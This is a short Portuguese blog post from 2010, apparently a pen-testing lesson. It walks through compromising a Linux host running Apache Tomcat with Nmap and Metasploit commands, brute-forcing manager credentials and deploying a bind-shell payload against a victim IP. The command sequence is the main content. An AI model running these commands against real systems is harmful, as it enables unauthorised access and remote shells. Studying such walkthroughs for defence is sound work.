Invasão em Micro Linux

agosto 29, 2010   Samukt   1 Comment

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit

Programas usados:
Metasploit
Nmap

Ambiente da aula e em uma distro Linux, lembrando que pode ser em qualquer sistema operacional que rode o metasploit.

Obs: O pessoal ja engessou que sistema operacional linux e seguro que Windows e vulnerável. O Linux da uma camada a mais de segurança, mas possui vulnerabilidades também. Sempre atualize.

A primeira coisa que vejo quando sai uma nova vul no Windows e “Use Linux”, vou começar a fazer uma serie de vídeo invadindo Linux.

Baixar:

Autor: Bhior

Posted in: Pen-Test   Tags: , ,

One Response to Invasão em Micro Linux

  1. Rafael José disse:
    dezembro 27, 2010 às 6:00 pm
    Mais isso ai não é uma vulnerabilidade direta do linux, e sim do programa tomcat.

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

*

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

  • Publicidade